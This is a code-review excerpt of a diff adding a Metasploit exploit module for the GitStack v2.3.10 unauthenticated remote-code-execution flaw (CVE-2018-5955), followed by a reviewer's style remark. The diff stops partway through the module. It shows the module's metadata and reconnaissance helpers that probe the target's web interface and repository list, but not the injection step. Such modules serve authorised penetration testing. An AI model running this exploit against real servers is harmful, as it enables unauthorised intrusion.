modules/exploits/windows/http/gitstack_rce.rb

```diff
@@ -0,0 +1,301 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = GreatRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::Powershell
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'GitStack v2.3.10 Unsanitized Argument',
+      'Description'    => %q{
+        This module exploits a remote code execution vulnerability in
+        GitStack v2.3.10, caused by an unsanitized argument being passed
+        to an exec function call. Earlier version of GitStack may be
+        affected.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'Kacper Szurek',    # Vulnerability discovery and PoC
+          'Jacob Robles'      # Metasploit module
+        ],
+      'References'     =>
+        [
+          ['CVE', '2018-5955'],
+          ['EDB', '43777'],
+          ['EDB', '44044'],
+          ['URL', 'https://security.szurek.pl/gitstack-2310-unauthenticated-rce.html']
+        ],
+      'DefaultOptions' =>
+        {
+          'EXITFUNC' => 'thread'
+        },
+      'Platform'       => 'win',
+      'Targets'        => [['Automatic', {}]],
+      'Privileged'     => true,
+      'DisclosureDate' => 'Jan 15 2018',
+      'DefaultTarget'  => 0))
+  end
+
+  def check_web
+    begin
+      res = send_request_cgi({
+        'uri'     =>  '/rest/settings/general/webinterface/',
+        'method'  => 'GET'
+      })
+    rescue Rex::ConnectionError, Errno::ECONNRESET => e
+      print_error("Failed: #{e.class} - #{e.message}")
+    end
+
+    if res && res.code == 200
+      if res.body =~ /true/
+        vprint_good('Web interface is enabled')
+        return true
+      else
+        vprint_error('Web interface is disabled')
+        return false
+      end
+    else
+      print_error('Unable to determine status of web interface')
+      return nil
+    end
+  end
+
+  def check_repos
+    begin
+      res = send_request_cgi({
+        'uri'     =>  '/rest/repository/',
+        'method'  =>  'GET',
+      })
+    rescue Rex::ConnectionError, Errno::ECONNRESET => e
+      print_error("Failed: #{e.class} - #{e.message}")
+    end
+    if res && res.code == 200
+      begin
+        mylist = res.get_json_document
+      rescue JSON::ParserError => e
+        print_error("Failed: #{e.class} - #{e.message}")
+        return nil
+      end
+
+      unless mylist.length == 0
```

Comment:
Maybe consider flipping this logic around per the style guide: https://github.com/bbatsov/ruby-style-guide#no-else-with-unless